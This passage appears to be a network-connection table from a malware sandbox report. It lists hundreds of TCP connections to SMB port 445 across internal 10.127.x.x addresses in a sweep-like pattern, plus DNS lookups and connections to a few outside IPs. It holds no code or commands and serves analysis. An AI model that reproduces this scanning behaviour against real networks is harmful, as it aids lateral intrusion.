| N/A | 10.127.3.140:445 | tcp | |
| N/A | 10.127.3.142:445 | tcp | |
| N/A | 10.127.3.166:445 | tcp | |
| N/A | 10.127.3.176:445 | tcp | |
| N/A | 10.127.3.170:445 | tcp | |
| N/A | 10.127.3.130:445 | tcp | |
| N/A | 10.127.3.160:445 | tcp | |
| N/A | 10.127.3.137:445 | tcp | |
| N/A | 10.127.3.169:445 | tcp | |
| N/A | 10.127.3.178:445 | tcp | |
| N/A | 10.127.3.180:445 | tcp | |
| N/A | 10.127.3.159:445 | tcp | |
| N/A | 10.127.3.164:445 | tcp | |
| N/A | 10.127.3.186:445 | tcp | |
| N/A | 10.127.3.168:445 | tcp | |
| N/A | 10.127.3.146:445 | tcp | |
| N/A | 10.127.3.145:445 | tcp | |
| N/A | 10.127.3.179:445 | tcp | |
| N/A | 10.127.3.132:445 | tcp | |
| N/A | 10.127.3.156:445 | tcp | |
| N/A | 10.127.3.155:445 | tcp | |
| N/A | 10.127.3.191:445 | tcp | |
| N/A | 10.127.3.189:445 | tcp | |
| N/A | 10.127.3.163:445 | tcp | |
| N/A | 10.127.3.188:445 | tcp | |
| N/A | 10.127.3.181:445 | tcp | |
| N/A | 10.127.3.134:445 | tcp | |
| N/A | 10.127.3.182:445 | tcp | |
| N/A | 10.127.3.138:445 | tcp | |
| N/A | 10.127.3.131:445 | tcp | |
| N/A | 10.127.3.185:445 | tcp | |
| N/A | 10.127.3.190:445 | tcp | |
| N/A | 10.127.3.141:445 | tcp | |
| N/A | 10.127.3.150:445 | tcp | |
| N/A | 10.127.3.153:445 | tcp | |
| N/A | 10.127.3.167:445 | tcp | |
| N/A | 10.127.3.139:445 | tcp | |
| N/A | 10.127.3.148:445 | tcp | |
| N/A | 10.127.3.144:445 | tcp | |
| N/A | 10.127.3.162:445 | tcp | |
| N/A | 10.127.3.147:445 | tcp | |
| N/A | 10.127.3.165:445 | tcp | |
| N/A | 10.127.3.171:445 | tcp | |
| N/A | 10.127.3.175:445 | tcp | |
| N/A | 10.127.3.177:445 | tcp | |
| N/A | 10.127.3.184:445 | tcp | |
| N/A | 10.127.3.133:445 | tcp | |
| N/A | 10.127.3.187:445 | tcp | |
| N/A | 10.127.3.143:445 | tcp | |
| N/A | 10.127.3.173:445 | tcp | |
| N/A | 10.127.3.183:445 | tcp | |
| N/A | 10.127.3.161:445 | tcp | |
| N/A | 10.127.3.192:445 | tcp | |
| N/A | 10.127.3.135:445 | tcp | |
| N/A | 10.127.3.149:445 | tcp | |
| N/A | 10.127.3.154:445 | tcp | |
| N/A | 10.127.3.213:445 | tcp | |
| N/A | 10.127.3.239:445 | tcp | |
| N/A | 10.127.4.0:445 | tcp | |
| N/A | 10.127.3.211:445 | tcp | |
| N/A | 10.127.3.249:445 | tcp | |
| N/A | 10.127.3.244:445 | tcp | |
| N/A | 10.127.3.232:445 | tcp | |
| N/A | 10.127.3.218:445 | tcp | |
| N/A | 10.127.3.200:445 | tcp | |
| N/A | 10.127.3.214:445 | tcp | |
| N/A | 10.127.3.194:445 | tcp | |
| N/A | 10.127.3.235:445 | tcp | |
| N/A | 10.127.3.199:445 | tcp | |
| N/A | 10.127.3.231:445 | tcp | |
| N/A | 10.127.3.253:445 | tcp | |
| N/A | 10.127.3.198:445 | tcp | |
| N/A | 10.127.3.205:445 | tcp | |
| N/A | 10.127.3.242:445 | tcp | |
| N/A | 10.127.3.204:445 | tcp | |
| N/A | 10.127.3.223:445 | tcp | |
| N/A | 10.127.3.222:445 | tcp | |
| N/A | 10.127.3.236:445 | tcp | |
| N/A | 10.127.3.255:445 | tcp | |
| N/A | 10.127.3.197:445 | tcp | |
| N/A | 10.127.3.215:445 | tcp | |
| N/A | 10.127.3.201:445 | tcp | |
| N/A | 10.127.3.234:445 | tcp | |
| N/A | 10.127.3.248:445 | tcp | |
| N/A | 10.127.3.221:445 | tcp | |
| N/A | 10.127.3.251:445 | tcp | |
| N/A | 10.127.3.212:445 | tcp | |
| N/A | 10.127.3.217:445 | tcp | |
| N/A | 10.127.3.227:445 | tcp | |
| N/A | 10.127.3.206:445 | tcp | |
| N/A | 10.127.3.216:445 | tcp | |
| N/A | 10.127.3.225:445 | tcp | |
| N/A | 10.127.3.229:445 | tcp | |
| N/A | 10.127.3.210:445 | tcp | |
| N/A | 10.127.3.220:445 | tcp | |
| N/A | 10.127.3.247:445 | tcp | |
| N/A | 10.127.3.195:445 | tcp | |
| N/A | 10.127.3.207:445 | tcp | |
| N/A | 10.127.3.228:445 | tcp | |
| N/A | 10.127.3.226:445 | tcp | |
| N/A | 10.127.3.238:445 | tcp | |
| N/A | 10.127.3.193:445 | tcp | |
| N/A | 10.127.3.237:445 | tcp | |
| N/A | 10.127.3.219:445 | tcp | |
| N/A | 10.127.3.250:445 | tcp | |
| N/A | 10.127.3.246:445 | tcp | |
| N/A | 10.127.3.202:445 | tcp | |
| N/A | 10.127.3.230:445 | tcp | |
| N/A | 10.127.3.208:445 | tcp | |
| N/A | 10.127.3.233:445 | tcp | |
| N/A | 10.127.3.245:445 | tcp | |
| N/A | 10.127.3.252:445 | tcp | |
| N/A | 10.127.3.254:445 | tcp | |
| N/A | 10.127.3.243:445 | tcp | |
| N/A | 10.127.3.203:445 | tcp | |
| N/A | 10.127.3.240:445 | tcp | |
| N/A | 10.127.3.196:445 | tcp | |
| N/A | 10.127.3.224:445 | tcp | |
| N/A | 10.127.3.241:445 | tcp | |
| N/A | 10.127.3.209:445 | tcp | |
| N/A | 10.127.4.27:445 | tcp | |
| N/A | 10.127.4.6:445 | tcp | |
| N/A | 10.127.4.16:445 | tcp | |
| N/A | 10.127.4.26:445 | tcp | |
| N/A | 10.127.4.57:445 | tcp | |
| N/A | 10.127.4.29:445 | tcp | |
| N/A | 10.127.4.62:445 | tcp | |
| N/A | 10.127.4.13:445 | tcp | |
| N/A | 10.127.4.22:445 | tcp | |
| N/A | 10.127.4.15:445 | tcp | |
| N/A | 10.127.4.14:445 | tcp | |
| N/A | 10.127.4.36:445 | tcp | |
| N/A | 10.127.4.43:445 | tcp | |
| N/A | 10.127.4.51:445 | tcp | |
| N/A | 10.127.4.20:445 | tcp | |
| N/A | 10.127.4.25:445 | tcp | |
| N/A | 10.127.4.33:445 | tcp | |
| N/A | 10.127.4.1:445 | tcp | |
| N/A | 10.127.4.56:445 | tcp | |
| N/A | 10.127.4.45:445 | tcp | |
| N/A | 10.127.4.44:445 | tcp | |
| N/A | 10.127.4.53:445 | tcp | |
| N/A | 10.127.4.54:445 | tcp | |
| N/A | 10.127.4.7:445 | tcp | |
| N/A | 10.127.4.23:445 | tcp | |
| N/A | 10.127.4.30:445 | tcp | |
| N/A | 10.127.4.5:445 | tcp | |
| N/A | 10.127.4.60:445 | tcp | |
| N/A | 10.127.4.50:445 | tcp | |
| N/A | 10.127.4.12:445 | tcp | |
| N/A | 10.127.4.34:445 | tcp | |
| N/A | 10.127.4.10:445 | tcp | |
| N/A | 10.127.4.47:445 | tcp | |
| N/A | 10.127.4.52:445 | tcp | |
| N/A | 10.127.4.28:445 | tcp | |
| N/A | 10.127.4.9:445 | tcp | |
| N/A | 10.127.4.59:445 | tcp | |
| N/A | 10.127.4.4:445 | tcp | |
| N/A | 10.127.4.42:445 | tcp | |
| N/A | 10.127.4.32:445 | tcp | |
| N/A | 10.127.4.63:445 | tcp | |
| N/A | 10.127.4.38:445 | tcp | |
| N/A | 10.127.4.49:445 | tcp | |
| N/A | 10.127.4.21:445 | tcp | |
| N/A | 10.127.4.35:445 | tcp | |
| N/A | 10.127.4.55:445 | tcp | |
| N/A | 10.127.4.24:445 | tcp | |
| N/A | 10.127.4.41:445 | tcp | |
| N/A | 10.127.4.39:445 | tcp | |
| N/A | 10.127.4.64:445 | tcp | |
| N/A | 10.127.4.3:445 | tcp | |
| N/A | 10.127.4.17:445 | tcp | |
| N/A | 10.127.4.19:445 | tcp | |
| N/A | 10.127.4.37:445 | tcp | |
| N/A | 10.127.4.40:445 | tcp | |
| N/A | 10.127.4.58:445 | tcp | |
| N/A | 10.127.4.48:445 | tcp | |
| N/A | 10.127.4.18:445 | tcp | |
| N/A | 10.127.4.46:445 | tcp | |
| N/A | 10.127.4.8:445 | tcp | |
| N/A | 10.127.4.2:445 | tcp | |
| N/A | 10.127.4.31:445 | tcp | |
| N/A | 10.127.4.11:445 | tcp | |
| N/A | 10.127.4.61:445 | tcp | |
| N/A | 10.127.4.111:445 | tcp | |
| N/A | 10.127.4.68:445 | tcp | |
| N/A | 10.127.4.65:445 | tcp | |
| N/A | 10.127.4.120:445 | tcp | |
| N/A | 10.127.4.85:445 | tcp | |
| N/A | 10.127.4.114:445 | tcp | |
| N/A | 10.127.4.98:445 | tcp | |
| N/A | 10.127.4.121:445 | tcp | |
| N/A | 10.127.4.73:445 | tcp | |
| N/A | 10.127.4.80:445 | tcp | |
| N/A | 10.127.4.66:445 | tcp | |
| N/A | 10.127.4.95:445 | tcp | |
| N/A | 10.127.4.87:445 | tcp | |
| N/A | 10.127.4.113:445 | tcp | |
| N/A | 10.127.4.84:445 | tcp | |
| N/A | 10.127.4.125:445 | tcp | |
| N/A | 10.127.4.77:445 | tcp | |
| N/A | 10.127.4.119:445 | tcp | |
| N/A | 10.127.4.86:445 | tcp | |
| N/A | 10.127.4.126:445 | tcp | |
| N/A | 10.127.4.93:445 | tcp | |
| N/A | 10.127.4.81:445 | tcp | |
| N/A | 10.127.4.82:445 | tcp | |
| N/A | 10.127.4.118:445 | tcp | |
| N/A | 10.127.4.103:445 | tcp | |
| N/A | 10.127.4.123:445 | tcp | |
| N/A | 10.127.4.115:445 | tcp | |
| N/A | 10.127.4.67:445 | tcp | |
| N/A | 10.127.4.69:445 | tcp | |
| N/A | 10.127.4.105:445 | tcp | |
| N/A | 10.127.4.104:445 | tcp | |
| N/A | 10.127.4.124:445 | tcp | |
| N/A | 10.127.4.88:445 | tcp | |
| N/A | 10.127.4.112:445 | tcp | |
| N/A | 10.127.4.127:445 | tcp | |
| N/A | 10.127.4.106:445 | tcp | |
| N/A | 10.127.4.72:445 | tcp | |
| N/A | 10.127.4.79:445 | tcp | |
| N/A | 10.127.4.107:445 | tcp | |
| N/A | 10.127.4.117:445 | tcp | |
| N/A | 10.127.4.75:445 | tcp | |
| N/A | 10.127.4.102:445 | tcp | |
| N/A | 10.127.4.109:445 | tcp | |
| N/A | 10.127.4.90:445 | tcp | |
| N/A | 10.127.4.97:445 | tcp | |
| N/A | 10.127.4.89:445 | tcp | |
| N/A | 10.127.4.128:445 | tcp | |
| N/A | 10.127.4.70:445 | tcp | |
| N/A | 10.127.4.116:445 | tcp | |
| N/A | 10.127.4.99:445 | tcp | |
| N/A | 10.127.4.71:445 | tcp | |
| N/A | 10.127.4.100:445 | tcp | |
| N/A | 10.127.4.108:445 | tcp | |
| N/A | 10.127.4.74:445 | tcp | |
| N/A | 10.127.4.110:445 | tcp | |
| N/A | 10.127.4.122:445 | tcp | |
| N/A | 10.127.4.96:445 | tcp | |
| N/A | 10.127.4.76:445 | tcp | |
| N/A | 10.127.4.83:445 | tcp | |
| N/A | 10.127.4.94:445 | tcp | |
| N/A | 10.127.4.78:445 | tcp | |
| N/A | 10.127.4.101:445 | tcp | |
| N/A | 10.127.4.91:445 | tcp | |
| N/A | 10.127.4.92:445 | tcp | |
| N/A | 10.127.4.136:445 | tcp | |
| N/A | 10.127.4.185:445 | tcp | |
| N/A | 10.127.4.147:445 | tcp | |
| N/A | 10.127.4.166:445 | tcp | |
| N/A | 10.127.4.134:445 | tcp | |
| N/A | 10.127.4.179:445 | tcp | |
| N/A | 10.127.4.148:445 | tcp | |
| N/A | 10.127.4.133:445 | tcp | |
| N/A | 10.127.4.139:445 | tcp | |
| N/A | 10.127.4.161:445 | tcp | |
| N/A | 10.127.4.186:445 | tcp | |
| N/A | 10.127.4.165:445 | tcp | |
| N/A | 10.127.4.184:445 | tcp | |
| N/A | 10.127.4.170:445 | tcp | |
| N/A | 10.127.4.171:445 | tcp | |
| N/A | 10.127.4.155:445 | tcp | |
| N/A | 10.127.4.181:445 | tcp | |
| N/A | 10.127.4.144:445 | tcp | |
| N/A | 10.127.4.159:445 | tcp | |
| N/A | 10.127.4.187:445 | tcp | |
| N/A | 10.127.4.142:445 | tcp | |
| N/A | 10.127.4.156:445 | tcp | |
| N/A | 10.127.4.176:445 | tcp | |
| N/A | 10.127.4.154:445 | tcp | |
| N/A | 10.127.4.138:445 | tcp | |
| N/A | 10.127.4.168:445 | tcp | |
| N/A | 10.127.4.173:445 | tcp | |
| N/A | 10.127.4.135:445 | tcp | |
| N/A | 10.127.4.180:445 | tcp | |
| N/A | 10.127.4.145:445 | tcp | |
| N/A | 10.127.4.129:445 | tcp | |
| N/A | 10.127.4.158:445 | tcp | |
| N/A | 10.127.4.189:445 | tcp | |
| N/A | 10.127.4.151:445 | tcp | |
| N/A | 10.127.4.182:445 | tcp | |
| N/A | 10.127.4.137:445 | tcp | |
| N/A | 10.127.4.190:445 | tcp | |
| N/A | 10.127.4.178:445 | tcp | |
| N/A | 10.127.4.163:445 | tcp | |
| N/A | 10.127.4.183:445 | tcp | |
| N/A | 10.127.4.149:445 | tcp | |
| N/A | 10.127.4.162:445 | tcp | |
| N/A | 10.127.4.141:445 | tcp | |
| N/A | 10.127.4.169:445 | tcp | |
| N/A | 10.127.4.130:445 | tcp | |
| N/A | 10.127.4.188:445 | tcp | |
| N/A | 10.127.4.157:445 | tcp | |
| N/A | 10.127.4.152:445 | tcp | |
| N/A | 10.127.4.172:445 | tcp | |
| N/A | 10.127.4.153:445 | tcp | |
| N/A | 10.127.4.164:445 | tcp | |
| N/A | 10.127.4.174:445 | tcp | |
| N/A | 10.127.4.191:445 | tcp | |
| N/A | 10.127.4.143:445 | tcp | |
| N/A | 10.127.4.150:445 | tcp | |
| N/A | 10.127.4.175:445 | tcp | |
| N/A | 10.127.4.131:445 | tcp | |
| N/A | 10.127.4.192:445 | tcp | |
| N/A | 10.127.4.132:445 | tcp | |
| N/A | 10.127.4.160:445 | tcp | |
| N/A | 10.127.4.146:445 | tcp | |
| N/A | 10.127.4.177:445 | tcp | |
| N/A | 10.127.4.140:445 | tcp | |
| N/A | 10.127.4.167:445 | tcp | |
| N/A | 10.127.4.213:445 | tcp | |
| N/A | 10.127.4.244:445 | tcp | |
| N/A | 10.127.4.193:445 | tcp | |
| N/A | 10.127.4.212:445 | tcp | |
| N/A | 10.127.4.239:445 | tcp | |
| N/A | 10.127.4.220:445 | tcp | |
| N/A | 10.127.4.242:445 | tcp | |
| N/A | 10.127.4.203:445 | tcp | |
| N/A | 10.127.4.252:445 | tcp | |
| N/A | 10.127.4.211:445 | tcp | |
| N/A | 10.127.4.247:445 | tcp | |
| N/A | 10.127.4.226:445 | tcp | |
| N/A | 10.127.4.232:445 | tcp | |
| N/A | 10.127.4.218:445 | tcp | |
| N/A | 10.127.4.208:445 | tcp | |
| N/A | 10.127.4.219:445 | tcp | |
| N/A | 10.127.4.249:445 | tcp | |
| N/A | 10.127.4.243:445 | tcp | |
| N/A | 10.127.4.201:445 | tcp | |
| N/A | 10.127.4.241:445 | tcp | |
| N/A | 10.127.4.196:445 | tcp | |
| N/A | 10.127.4.197:445 | tcp | |
| N/A | 10.127.4.200:445 | tcp | |
| N/A | 10.127.4.206:445 | tcp | |
| N/A | 10.127.4.207:445 | tcp | |
| N/A | 10.127.4.225:445 | tcp | |
| N/A | 10.127.4.222:445 | tcp | |
| N/A | 10.127.4.228:445 | tcp | |
| N/A | 10.127.4.217:445 | tcp | |
| N/A | 10.127.4.224:445 | tcp | |
| N/A | 10.127.4.250:445 | tcp | |
| N/A | 10.127.4.234:445 | tcp | |
| N/A | 10.127.4.221:445 | tcp | |
| N/A | 10.127.4.251:445 | tcp | |
| N/A | 10.127.4.194:445 | tcp | |
| N/A | 10.127.4.210:445 | tcp | |
| N/A | 10.127.4.248:445 | tcp | |
| N/A | 10.127.4.231:445 | tcp | |
| N/A | 10.127.4.246:445 | tcp | |
| N/A | 10.127.4.198:445 | tcp | |
| N/A | 10.127.4.223:445 | tcp | |
| N/A | 10.127.4.235:445 | tcp | |
| N/A | 10.127.4.238:445 | tcp | |
| N/A | 10.127.4.254:445 | tcp | |
| N/A | 10.127.4.204:445 | tcp | |
| N/A | 10.127.4.216:445 | tcp | |
| N/A | 10.127.4.230:445 | tcp | |
| N/A | 10.127.4.229:445 | tcp | |
| N/A | 10.127.4.233:445 | tcp | |
| N/A | 10.127.4.245:445 | tcp | |
| N/A | 10.127.4.240:445 | tcp | |
| N/A | 10.127.4.237:445 | tcp | |
| N/A | 10.127.4.253:445 | tcp | |
| N/A | 10.127.4.227:445 | tcp | |
| N/A | 10.127.5.0:445 | tcp | |
| N/A | 10.127.4.199:445 | tcp | |
| N/A | 10.127.4.202:445 | tcp | |
| N/A | 10.127.4.214:445 | tcp | |
| N/A | 10.127.4.205:445 | tcp | |
| N/A | 10.127.4.209:445 | tcp | |
| N/A | 10.127.4.215:445 | tcp | |
| N/A | 10.127.4.236:445 | tcp | |
| N/A | 10.127.4.255:445 | tcp | |
| N/A | 10.127.4.195:445 | tcp | |
| N/A | 10.127.5.19:445 | tcp | |
| N/A | 10.127.5.31:445 | tcp | |
| N/A | 10.127.5.41:445 | tcp | |
| N/A | 10.127.5.13:445 | tcp | |
| N/A | 10.127.5.32:445 | tcp | |
| N/A | 10.127.5.49:445 | tcp | |
| N/A | 10.127.5.25:445 | tcp | |
| N/A | 10.127.5.52:445 | tcp | |
| N/A | 10.127.5.60:445 | tcp | |
| N/A | 10.127.5.6:445 | tcp | |
| N/A | 10.127.5.53:445 | tcp | |
| N/A | 10.127.5.63:445 | tcp | |
| N/A | 10.127.5.10:445 | tcp | |
| N/A | 10.127.5.17:445 | tcp | |
| N/A | 10.127.5.8:445 | tcp | |
| N/A | 10.127.5.37:445 | tcp | |
| N/A | 10.127.5.42:445 | tcp | |
| N/A | 10.127.5.2:445 | tcp | |
| N/A | 10.127.5.14:445 | tcp | |
| N/A | 10.127.5.51:445 | tcp | |
| N/A | 10.127.5.23:445 | tcp | |
| N/A | 10.127.5.54:445 | tcp | |
| N/A | 10.127.5.46:445 | tcp | |
| N/A | 10.127.5.43:445 | tcp | |
| N/A | 10.127.5.7:445 | tcp | |
| N/A | 10.127.5.11:445 | tcp | |
| N/A | 10.127.5.5:445 | tcp | |
| N/A | 10.127.5.55:445 | tcp | |
| N/A | 10.127.5.1:445 | tcp | |
| N/A | 10.127.5.24:445 | tcp | |
| N/A | 10.127.5.34:445 | tcp | |
| N/A | 10.127.5.38:445 | tcp | |
| N/A | 10.127.5.48:445 | tcp | |
| N/A | 10.127.5.50:445 | tcp | |
| N/A | 10.127.5.59:445 | tcp | |
| N/A | 10.127.5.45:445 | tcp | |
| N/A | 10.127.5.61:445 | tcp | |
| N/A | 10.127.5.64:445 | tcp | |
| N/A | 10.127.5.21:445 | tcp | |
| N/A | 10.127.5.40:445 | tcp | |
| N/A | 10.127.5.15:445 | tcp | |
| N/A | 10.127.5.36:445 | tcp | |
| N/A | 10.127.5.56:445 | tcp | |
| N/A | 10.127.5.26:445 | tcp | |
| N/A | 10.127.5.35:445 | tcp | |
| N/A | 10.127.5.39:445 | tcp | |
| N/A | 10.127.5.27:445 | tcp | |
| N/A | 10.127.5.22:445 | tcp | |
| N/A | 10.127.5.57:445 | tcp | |
| N/A | 10.127.5.12:445 | tcp | |
| N/A | 10.127.5.62:445 | tcp | |
| N/A | 10.127.5.44:445 | tcp | |
| N/A | 10.127.5.58:445 | tcp | |
| N/A | 10.127.5.3:445 | tcp | |
| N/A | 10.127.5.33:445 | tcp | |
| N/A | 10.127.5.16:445 | tcp | |
| N/A | 10.127.5.4:445 | tcp | |
| N/A | 10.127.5.18:445 | tcp | |
| N/A | 10.127.5.28:445 | tcp | |
| N/A | 10.127.5.30:445 | tcp | |
| N/A | 10.127.5.47:445 | tcp | |
| N/A | 10.127.5.9:445 | tcp | |
| N/A | 10.127.5.20:445 | tcp | |
| N/A | 10.127.5.29:445 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 162.159.135.233:443 | tcp | |
| N/A | 10.127.5.114:445 | tcp | |
| N/A | 10.127.5.127:445 | tcp | |
| N/A | 10.127.5.72:445 | tcp | |
| N/A | 10.127.5.89:445 | tcp | |
| N/A | 10.127.5.113:445 | tcp | |
| N/A | 10.127.5.123:445 | tcp | |
| N/A | 10.127.5.121:445 | tcp | |
| N/A | 10.127.5.68:445 | tcp | |
| N/A | 10.127.5.111:445 | tcp | |
| N/A | 10.127.5.87:445 | tcp | |
| N/A | 10.127.5.102:445 | tcp | |
| N/A | 10.127.5.75:445 | tcp | |
| N/A | 10.127.5.103:445 | tcp | |
| N/A | 10.127.5.80:445 | tcp | |
| N/A | 10.127.5.117:445 | tcp | |
| N/A | 10.127.5.67:445 | tcp | |
| N/A | 10.127.5.90:445 | tcp | |
| N/A | 10.127.5.128:445 | tcp | |
| N/A | 10.127.5.73:445 | tcp | |
| N/A | 10.127.5.91:445 | tcp | |
| N/A | 10.127.5.74:445 | tcp | |
| N/A | 10.127.5.101:445 | tcp | |
| N/A | 10.127.5.120:445 | tcp | |
| N/A | 10.127.5.83:445 | tcp | |
| N/A | 10.127.5.109:445 | tcp | |
| N/A | 10.127.5.70:445 | tcp | |
| N/A | 10.127.5.104:445 | tcp | |
| N/A | 10.127.5.100:445 | tcp | |
| N/A | 10.127.5.88:445 | tcp | |
| N/A | 10.127.5.94:445 | tcp | |
| N/A | 10.127.5.99:445 | tcp | |
| N/A | 10.127.5.69:445 | tcp | |
| N/A | 10.127.5.106:445 | tcp | |
| N/A | 10.127.5.126:445 | tcp | |
| N/A | 10.127.5.65:445 | tcp | |
| N/A | 10.127.5.110:445 | tcp | |
| N/A | 10.127.5.79:445 | tcp | |
| N/A | 10.127.5.115:445 | tcp | |
| N/A | 10.127.5.124:445 | tcp | |
| N/A | 10.127.5.96:445 | tcp | |
| N/A | 10.127.5.86:445 | tcp | |
| N/A | 10.127.5.125:445 | tcp | |
| N/A | 10.127.5.82:445 | tcp | |
| N/A | 10.127.5.71:445 | tcp | |
| N/A | 10.127.5.81:445 | tcp | |
| N/A | 10.127.5.122:445 | tcp | |
| N/A | 10.127.5.107:445 | tcp | |
| N/A | 10.127.5.118:445 | tcp | |
| N/A | 10.127.5.66:445 | tcp | |
| N/A | 10.127.5.78:445 | tcp | |
| N/A | 10.127.5.116:445 | tcp | |
| N/A | 10.127.5.76:445 | tcp | |
| N/A | 10.127.5.95:445 | tcp | |
| N/A | 10.127.5.84:445 | tcp | |
| N/A | 10.127.5.105:445 | tcp | |
| N/A | 10.127.5.108:445 | tcp | |
| N/A | 10.127.5.77:445 | tcp | |
| N/A | 10.127.5.119:445 | tcp | |
| N/A | 10.127.5.97:445 | tcp | |
| N/A | 10.127.5.92:445 | tcp | |
| N/A | 10.127.5.93:445 | tcp | |
| N/A | 10.127.5.98:445 | tcp | |
| N/A | 10.127.5.112:445 | tcp | |
| N/A | 10.127.5.85:445 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 46.8.8.100:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 81.3.27.44:3478 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 10.127.0.63:445 | tcp | |
| N/A | 10.127.0.32:445 | tcp | |
| N/A | 10.127.0.33:445 | tcp | |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.0.0:445 | tcp | |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.0.37:445 | tcp | |
| N/A | 10.127.0.2:445 | tcp | |
| N/A | 10.127.0.38:445 | tcp | |
| N/A | 10.127.0.4:445 | tcp | |
| N/A | 10.127.0.39:445 | tcp | |
| N/A | 10.127.0.5:445 | tcp | |
| N/A | 10.127.0.7:445 | tcp | |
| N/A | 10.127.0.41:445 | tcp | |
| N/A | 10.127.0.42:445 | tcp | |
| N/A | 10.127.0.8:445 | tcp | |
| N/A | 10.127.0.43:445 | tcp | |
| N/A | 10.127.0.44:445 | tcp | |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.0.10:445 | tcp | |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.0.13:445 | tcp | |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.0.15:445 | tcp | |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.0.46:445 | tcp | |
| N/A | 10.127.0.47:445 | tcp | |
| N/A | 10.127.0.48:445 | tcp | |
| N/A | 10.127.0.49:445 | tcp | |
| N/A | 10.127.0.50:445 | tcp | |
| N/A | 10.127.0.51:445 | tcp | |
| N/A | 10.127.0.52:445 | tcp | |
| N/A | 10.127.0.53:445 | tcp | |
| N/A | 10.127.0.18:445 | tcp | |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.0.56:445 | tcp | |
| N/A | 10.127.0.57:445 | tcp | |
| N/A | 10.127.0.20:445 | tcp | |
| N/A | 10.127.0.59:445 | tcp | |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.0.60:445 | tcp | |
| N/A | 10.127.0.22:445 | tcp | |
| N/A | 10.127.0.61:445 | tcp | |
| N/A | 10.127.0.62:445 | tcp | |
| N/A | 10.127.0.24:445 | tcp | |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.0.27:445 | tcp | |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.0.29:445 | tcp | |
| N/A | 10.127.0.30:445 | tcp | |
| N/A | 10.127.0.64:445 | tcp | |
| N/A | 10.127.0.65:445 | tcp | |
| N/A | 10.127.0.66:445 | tcp | |
| N/A | 10.127.0.68:445 | tcp | |
| N/A | 10.127.0.67:445 | tcp | |
| N/A | 10.127.0.69:445 | tcp | |
| N/A | 10.127.0.70:445 | tcp | |
| N/A | 10.127.0.71:445 | tcp | |
| N/A | 10.127.0.72:445 | tcp | |
| N/A | 10.127.0.73:445 | tcp | |
| N/A | 10.127.0.74:445 | tcp | |
| N/A | 10.127.0.75:445 | tcp | |
| N/A | 10.127.0.77:445 | tcp | |
| N/A | 10.127.0.76:445 | tcp | |
| N/A | 10.127.0.79:445 | tcp | |
| N/A | 10.127.0.78:445 | tcp | |
| N/A | 10.127.0.82:445 | tcp | |
| N/A | 10.127.0.83:445 | tcp | |
| N/A | 10.127.0.84:445 | tcp | |
| N/A | 10.127.0.85:445 | tcp | |
| N/A | 10.127.0.80:445 | tcp | |
| N/A | 10.127.0.81:445 | tcp | |
| N/A | 10.127.0.87:445 | tcp | |
| N/A | 10.127.0.86:445 | tcp | |
| N/A | 10.127.0.92:445 | tcp | |
| N/A | 10.127.0.88:445 | tcp | |
| N/A | 10.127.0.89:445 | tcp | |
| N/A | 10.127.0.90:445 | tcp | |
| N/A | 10.127.0.91:445 | tcp | |
| N/A | 10.127.0.93:445 | tcp | |
| N/A | 10.127.0.94:445 | tcp | |
| N/A | 10.127.0.95:445 | tcp | |
| N/A | 10.127.0.102:445 | tcp | |
| N/A | 10.127.0.96:445 | tcp | |
| N/A | 10.127.0.97:445 | tcp | |
| N/A | 10.127.0.98:445 | tcp | |
| N/A | 10.127.0.99:445 | tcp | |
| N/A | 10.127.0.100:445 | tcp | |
| N/A | 10.127.0.101:445 | tcp | |
| N/A | 10.127.0.103:445 | tcp | |
| N/A | 10.127.0.104:445 | tcp | |
| N/A | 10.127.0.105:445 | tcp | |
| N/A | 10.127.0.107:445 | tcp | |
| N/A | 10.127.0.108:445 | tcp | |
| N/A | 10.127.0.109:445 | tcp | |
| N/A | 10.127.0.110:445 | tcp | |
| N/A | 10.127.0.111:445 | tcp | |
| N/A | 10.127.0.112:445 | tcp | |
| N/A | 10.127.0.113:445 | tcp | |
| N/A | 10.127.0.114:445 | tcp | |
| N/A | 10.127.0.115:445 | tcp | |
| N/A | 10.127.0.116:445 | tcp | |
| N/A | 10.127.0.117:445 | tcp | |
| N/A | 10.127.0.118:445 | tcp | |
| N/A | 10.127.0.119:445 | tcp | |
| N/A | 10.127.0.120:445 | tcp | |
| N/A | 10.127.0.121:445 | tcp | |
| N/A | 10.127.0.122:445 | tcp | |
| N/A | 10.127.0.123:445 | tcp | |
| N/A | 10.127.0.124:445 | tcp | |
| N/A | 10.127.0.125:445 | tcp | |
| N/A | 10.127.0.126:445 | tcp | |
| N/A | 10.127.0.127:445 | tcp | |
| N/A | 10.127.0.106:445 | tcp | |
| N/A | 127.0.0.1:31465 | tcp | |
| N/A | 10.127.5.191:445 | tcp | |
| N/A | 10.127.5.180:445 | tcp | |
| N/A | 10.127.5.136:445 | tcp | |
| N/A | 10.127.5.156:445 | tcp | |
| N/A | 10.127.5.167:445 | tcp | |
| N/A | 10.127.5.138:445 | tcp | |
| N/A | 10.127.5.159:445 | tcp | |
| N/A | 10.127.5.190:445 | tcp | |
| N/A | 10.127.5.186:445 | tcp | |
| N/A | 10.127.5.188:445 | tcp | |
| N/A | 10.127.5.153:445 | tcp | |
| N/A | 10.127.5.183:445 | tcp | |
| N/A | 10.127.5.131:445 | tcp | |
| N/A | 10.127.5.130:445 | tcp | |
| N/A | 10.127.5.143:445 | tcp | |
| N/A | 10.127.5.165:445 | tcp | |
| N/A | 10.127.5.178:445 | tcp | |
| N/A | 10.127.5.170:445 | tcp | |
| N/A | 10.127.5.133:445 | tcp | |
| N/A | 10.127.5.135:445 | tcp | |
| N/A | 10.127.5.169:445 | tcp | |
| N/A | 10.127.5.146:445 | tcp | |
| N/A | 10.127.5.139:445 | tcp | |
